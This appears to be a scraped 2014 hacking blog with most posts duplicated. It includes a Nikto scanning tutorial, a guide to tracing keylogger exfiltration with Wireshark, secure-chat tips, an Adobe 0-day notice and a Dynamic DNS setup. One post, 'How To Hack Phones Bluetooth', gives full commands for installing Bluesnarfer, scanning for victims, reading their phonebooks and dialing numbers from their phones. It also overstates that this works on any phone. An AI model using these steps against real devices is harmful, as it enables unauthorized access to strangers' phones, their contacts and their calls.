The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.
Wednesday, August 27, 2014
Hackforums.net and .com have been hacked. DNS hacked.
It appears the most famous hacking forum online has been hacked. It appears that the DNS of the site was hacked, and the site still loads alright for some users including on mobile. This isn't the first time the forum has been hacked. In the past the site was hacked and entire databases of information stolen. It doesn't seem to be that critical this time around but time will tell.

The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.
The owner, Omniscient, said that no data was breached via Twitter with mild annoyance.
Friday, August 22, 2014
How To Test A Website Or Web Server For Vulnerabilities
Do you want to know how to run some basic tests on your web server to see if it is vulnerable? This tutorial will teach you how to penetrate your own webserver and test for vlunerabilities. This method is very traceable, so I suggest you only use it on your own web servers and with your Hosts permission.
In this tutorial you will learn how to use a simple tool to find vulnerabilities on your webserver. The tool is called Nikto and is ran on Kali Linux.
Step 1: Run Nikto on Kali Linux
We will use Kali because Nikto is preinstalled. Go to: "Kali Linux - Vulnerability Analysis - Misc Scanners - nikto" and run it.

Step 2: Scan your server
To scan for vulnerabilities on a website type:
nikto -h example.com
You can use this to scan URLs as well as IP addresses. If you want to know the IP of a website just ping it.
Example:
ping example.com

Step 3: Analyse the server vulnerabilities.
Nikto will give you a report of potential vulnerabilities on the websites server. The scan will give you a list of potential vulnerabilities a hacker could try to exploit on the webserver. Some of the vulnerabilities could be a false positive so be aware of that possibility. Some of the vulnerabilities will be have a OSVDB prefix, which stands for Open Source Vulnerability Database which is a vast database of known vulnerabilities. You can check the vulnerability IDs here: http://www.osvdb.org
Warning: Only use this on your own server or servers you are authorized to Pen test.
In this tutorial you will learn how to use a simple tool to find vulnerabilities on your webserver. The tool is called Nikto and is ran on Kali Linux.
Step 1: Run Nikto on Kali Linux
We will use Kali because Nikto is preinstalled. Go to: "Kali Linux - Vulnerability Analysis - Misc Scanners - nikto" and run it.
Step 2: Scan your server
To scan for vulnerabilities on a website type:
nikto -h example.com
You can use this to scan URLs as well as IP addresses. If you want to know the IP of a website just ping it.
Example:
ping example.com
Step 3: Analyse the server vulnerabilities.
Nikto will give you a report of potential vulnerabilities on the websites server. The scan will give you a list of potential vulnerabilities a hacker could try to exploit on the webserver. Some of the vulnerabilities could be a false positive so be aware of that possibility. Some of the vulnerabilities will be have a OSVDB prefix, which stands for Open Source Vulnerability Database which is a vast database of known vulnerabilities. You can check the vulnerability IDs here: http://www.osvdb.org
Warning: Only use this on your own server or servers you are authorized to Pen test.
Monday, August 18, 2014
Backtrace A Hackers Keylogger or Rat
Have you been infected with a RAT or a Keylogger and want to find out who your attacker is? Almost all Keyloggers and RATs send information to the hacker via 2 methods. In this tutorial we will explain how to find out who they are using a program called Wireshark.
There are 2 ways an attacker can receive your information. Emails and FTP servers. You must undertstand how this works first.
By Email: The hacker configures his malware and while configuring the virus server, the hack has to input which email address to send the stolen information.
By FTP server: Much like the email method, except instead of configuring an email to send your infomation to they have an FTP server that recieves your information. Usually both methods have text logs of your keystroke activity once you have been infected.
If we monitor all data packets we can scan for one of the methods and we will have the hackers FTP info or his email address.
Wireshark is a very useful and popular network scanning tool that is used by network forensic experts to monitor the incoming and outgoing packet flow of their network cards like Ethernet or WLAN. It records every packet coming and going out of your Network.
Whenever you think you may be infected, follow the steps below to find out if and who has infected you.
Step 1
1. First of all download and install Wireshark. You can find it HERE.
Note: While Wireshark installing please ensure that it installs Winpcap otherwise it won't work correctly.
2. Now go to the "Capture" button in the top menu of Wireshark and select the interface.
3. It will capture the packets through the Network card. What you have to do is keep capturing the records for at least an hour for maximum results.
4. Now you should filter the results. Go to the filter box and type FTP and SMTP. If one doesn't work, try the other as the hacker could be using either.
5. Scroll down to find the “FTP username” and the “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will also find "email address" and its "password" that the hacker used to create the malicious server that infected you.
Thats it! You have found the hacker. Note: More advanced hacker will have other methods of securing themselves. This may not always work, but is a great first step for backtracing and catching a hacker who has infected your system.
There are 2 ways an attacker can receive your information. Emails and FTP servers. You must undertstand how this works first.
By Email: The hacker configures his malware and while configuring the virus server, the hack has to input which email address to send the stolen information.
By FTP server: Much like the email method, except instead of configuring an email to send your infomation to they have an FTP server that recieves your information. Usually both methods have text logs of your keystroke activity once you have been infected.
If we monitor all data packets we can scan for one of the methods and we will have the hackers FTP info or his email address.
Wireshark is a very useful and popular network scanning tool that is used by network forensic experts to monitor the incoming and outgoing packet flow of their network cards like Ethernet or WLAN. It records every packet coming and going out of your Network.
Whenever you think you may be infected, follow the steps below to find out if and who has infected you.
Step 1
1. First of all download and install Wireshark. You can find it HERE.
Note: While Wireshark installing please ensure that it installs Winpcap otherwise it won't work correctly.
2. Now go to the "Capture" button in the top menu of Wireshark and select the interface.
3. It will capture the packets through the Network card. What you have to do is keep capturing the records for at least an hour for maximum results.
4. Now you should filter the results. Go to the filter box and type FTP and SMTP. If one doesn't work, try the other as the hacker could be using either.
5. Scroll down to find the “FTP username” and the “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will also find "email address" and its "password" that the hacker used to create the malicious server that infected you.
Thats it! You have found the hacker. Note: More advanced hacker will have other methods of securing themselves. This may not always work, but is a great first step for backtracing and catching a hacker who has infected your system.
How Use Secure Encrypted Chat - Skype Alternatives
Are you still using skype to communicate for product support, or with strangers or people you barely know? If you are, stop. You are at risk because Skype is not secure. Skype is a chat protocol that allows people to grab your IP address due to the way it connects, which means you are vulnerable to Ddos attacks, and other types of attacks. They are also really easy to social engineer and steal accounts from. Stop using it, and use something more secure. In this article I will give you a few methods in which you can chat securely and with encryption.
Jabber Off The Record Secure chat:
The first program I will be showing you is Jabber and the OTR plugin for Jabber.
How to setup jabber:
1) Download Pidgin HERE
2) Download the OTR encryption plugin for Pidgin HERE
3) Now go here HERE and create an account. Remember the credentials you use as you will need them to login to Jabber. This is essentially your username and password for the chat program.
4) Now open up pidgin now at the tool bar at the top
Click Accounts > Manage Accounts > Add
A box will pop up. This is where you put in your jabber information. You need to put the protocol as XMPP, the username is the one you picked when you signup on zsim.de The domain is zsim.de. The password you will get when confirming your account on zsim.de. Everything else doesn't matter.
This is how it should look.

5) Now to add the OTR plugin after you downloaded and set it up you will need to add it to pidgin to do this you will need to go to Tools > Plugins > Then click off the record messaging.

Now you can add your friends by their jabber info by going to Buddies > Add buddies then type the buddies XMPP/Jabber email.
Tox: A New Kind Of Messaging
Tox is a new alternative to Skype, and allows more than Jabber does in terms of user friendly features.
From their website:
Jabber Off The Record Secure chat:
The first program I will be showing you is Jabber and the OTR plugin for Jabber.
How to setup jabber:
1) Download Pidgin HERE
2) Download the OTR encryption plugin for Pidgin HERE
3) Now go here HERE and create an account. Remember the credentials you use as you will need them to login to Jabber. This is essentially your username and password for the chat program.
4) Now open up pidgin now at the tool bar at the top
Click Accounts > Manage Accounts > Add
A box will pop up. This is where you put in your jabber information. You need to put the protocol as XMPP, the username is the one you picked when you signup on zsim.de The domain is zsim.de. The password you will get when confirming your account on zsim.de. Everything else doesn't matter.
This is how it should look.
5) Now to add the OTR plugin after you downloaded and set it up you will need to add it to pidgin to do this you will need to go to Tools > Plugins > Then click off the record messaging.
Now you can add your friends by their jabber info by going to Buddies > Add buddies then type the buddies XMPP/Jabber email.
Tox: A New Kind Of Messaging
Tox is a new alternative to Skype, and allows more than Jabber does in terms of user friendly features.
From their website:
A New Kind of Instant Messaging
With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising.
About Tox
Nowadays, every government seems to be interested in what we're saying online. Tox is built on a "privacy goes first" agenda, and we make no compromises. Your safety is our top priority, and there isn't anything in the world that will change that.
- Messages: At your fingertips.
- You're always in the loop with instant encrypted messaging.
- Calls: Make free and secure Tox to Tox calls.
- Video: Catch up face to face with a secure video call.
- Security: Tox takes your privacy seriously. With leading-class encryption, you can rest assured knowing that the only people reading your messages are the ones you send them to.
Picture credits: https://tox.im/
Tox is simple and easy to use, setup and enjoy. Compared to Skype, this is a now brainer because it can do everything Skype can do securely and you can be worry free about whether or not you will have your account stolen or someone can resolve your IP address. Visit https://tox.im/ to create an account.
Saturday, August 16, 2014
How To Hack Phones Bluetooth With Kali Linux And Backtrack
Do you want to learn how to hack a phone via Bluetooth using Kali Linux? The you have come to the right place. In this tutorial we will teach you how to hack any phone, whether it be Android, iPhone or Windows based phone using the power of Kali Linux aka backtrack and exploiting the Bluetooth connection of the phone itself.
Step 1. Install Bluesnarfer to your Linux machine using the CMD.
Open the opt directory
Make your way to the opt directory:
Download Bluesnarfer using wget
Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.
To extract you will need to use the tar xvf command
open the directory again with ls to see bluesnarfer there.
Open the directory bluesnarfer created
Finish it off by compiling the install:
To see the Bluesnarfer commands run: ./bluesnarfer
Step 2: Now that Bluesnarfer is installed, configure rfcomm.
Now to scan for potential vulnerabilities:
Ping the victim to see if he is there:
Browse the victim for rfcomm channels to connect to:
Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.
To see available commands:
To dial a number:
This is what the Bluesnarfer shell should look like:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (received call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Step 1. Install Bluesnarfer to your Linux machine using the CMD.
Open the opt directory
Make your way to the opt directory:
cd /opt
Download Bluesnarfer using wget
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz
Open the directory again using the ls command and see if Bluesnarfer is there, then extract it.
:/opt# ls
bluesnarfer.tar.gz firmware-mod-kit metasploit Teeth
To extract you will need to use the tar xvf command
/opt# tar xvf bluesnarfer.tar.gz
open the directory again with ls to see bluesnarfer there.
/opt# ls
BFi13-dev-18 bluesnarfer.tar.gz metasploit
bluesnarfer firmware-mod-kit Teeth
Open the directory bluesnarfer created
/opt# cd bluesnarfer
/opt/bluesnarfer# ls
include Makefile README src
Finish it off by compiling the install:
/opt/bluesnarfer# make
To see the Bluesnarfer commands run: ./bluesnarfer
:/opt/bluesnarfer# ./bluesnarfer
Step 2: Now that Bluesnarfer is installed, configure rfcomm.
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
Now to scan for potential vulnerabilities:
hcitool scan hci0
Ping the victim to see if he is there:
l2ping < victim mac addr>
Browse the victim for rfcomm channels to connect to:
sdptool browse --tree --l2cap < mac addr >
Now Bluesnarfer is setup. Now you can access the victims phone to see texts, make phone calls etc.
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
To see available commands:
bluebugger -h
To dial a number:
bluebugger -m < victim's name > -c 7 -a < mac addr > Dial < number >
This is what the Bluesnarfer shell should look like:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (received call list)
"XX" much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel
-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Friday, August 15, 2014
Adobe 0-Days found, Update Adobe Immediately.
Recently there have been 0-Day exploits found for a few select Adobe products. They have released updates to address the exploit to keep its customers safe from hackers. The programs that have been updated are:
The new updates were to patch exploits and various vulnerabilities that are "critical" to preform. The vulnerabilities are 0-day exploits that allow attacks to bypass sandbox protection of the Adobe products and run elevated access under windows to natively run code and remotely control slave computers infected by the 0-day.
Kaspersky Labs Global Research and Analysis Team reported CVE-2014-0546, but would not give any technical information as they are not finished with the investigation. The do confirm that the exploit has been run in some recent computers before they were made aware of this exploit.
The specific affected versions are:
Source: http://helpx.adobe.com/security/products/flash-player/apsb14-17.html
- Adobe Flash Player
- Adobe AIR
- Adobe Flash Player
- Adobe Acrobat
The new updates were to patch exploits and various vulnerabilities that are "critical" to preform. The vulnerabilities are 0-day exploits that allow attacks to bypass sandbox protection of the Adobe products and run elevated access under windows to natively run code and remotely control slave computers infected by the 0-day.
Kaspersky Labs Global Research and Analysis Team reported CVE-2014-0546, but would not give any technical information as they are not finished with the investigation. The do confirm that the exploit has been run in some recent computers before they were made aware of this exploit.
The specific affected versions are:
- Adobe Flash Player 14.0.0.145 and earlier versions for Windows and Macintosh
- Adobe Flash Player 11.2.202.394 and earlier versions for Linux
- Adobe AIR 14.0.0.110 and earlier versions for Windows and Macintosh
- Adobe AIR 14.0.0.137 SDK and earlier versions
- Adobe AIR 14.0.0.137 SDK & Compiler and earlier versions
- Adobe AIR 14.0.0.137 and earlier versions for Android
Source: http://helpx.adobe.com/security/products/flash-player/apsb14-17.html
Thursday, August 14, 2014
How to setup a Dynamic DNS - An Alternative to no-IP
So you need a Dynamic DNS and No-IP just doesn't cut it due to their recent legal issues? You have heard that No-IP has been compromised and need an alternative. We have an alternative for you, and in this tutorial we will show you step by step on how to set it up.
First of all, you must understand what a Dynamic DNS is. Basically it points a subdomain to your IP address to redirect anything connected to your IP address even if it changes. IP addresses will inevitably change. You also can connect to the Dynamic DNS directly instead of your IP, so you can keep your IP address to yourself. You can use this for game servers, personal networking and RDPs etc. 2
How to setup FreeDNS:
Step 1: Sign up at: http://freedns.afraid.org/signup/
Enter your details and send your activation email. Then check your email and you can proceed to step 2.

Step 2: Click on Dynamic DNS.
It may ask you to login. Once you have logged in you will need to navigate to the "Subdomain" section of the menu as seen below.

Step 3. Fill out the form with a domain, and subdomain to go with it. This will be your Dynamic DNS.

Once you have chosen your information it should look like this:

Step 4. Download the wget installer HERE.
Step 5. Go back to Dynamic DNS and you will see the below page. Click on wget scripts and it will download a .bat which you will need for the next step.

Step 6. Run the .bat file whenever you need your Dynamic DNS and it will Sync. You should run this before doing anything requiring a DNS.
First of all, you must understand what a Dynamic DNS is. Basically it points a subdomain to your IP address to redirect anything connected to your IP address even if it changes. IP addresses will inevitably change. You also can connect to the Dynamic DNS directly instead of your IP, so you can keep your IP address to yourself. You can use this for game servers, personal networking and RDPs etc. 2
How to setup FreeDNS:
Step 1: Sign up at: http://freedns.afraid.org/signup/
Enter your details and send your activation email. Then check your email and you can proceed to step 2.
Step 2: Click on Dynamic DNS.
It may ask you to login. Once you have logged in you will need to navigate to the "Subdomain" section of the menu as seen below.
Step 3. Fill out the form with a domain, and subdomain to go with it. This will be your Dynamic DNS.
Once you have chosen your information it should look like this:
Step 4. Download the wget installer HERE.
Step 5. Go back to Dynamic DNS and you will see the below page. Click on wget scripts and it will download a .bat which you will need for the next step.
Step 6. Run the .bat file whenever you need your Dynamic DNS and it will Sync. You should run this before doing anything requiring a DNS.
Subscribe to:
Posts (Atom)
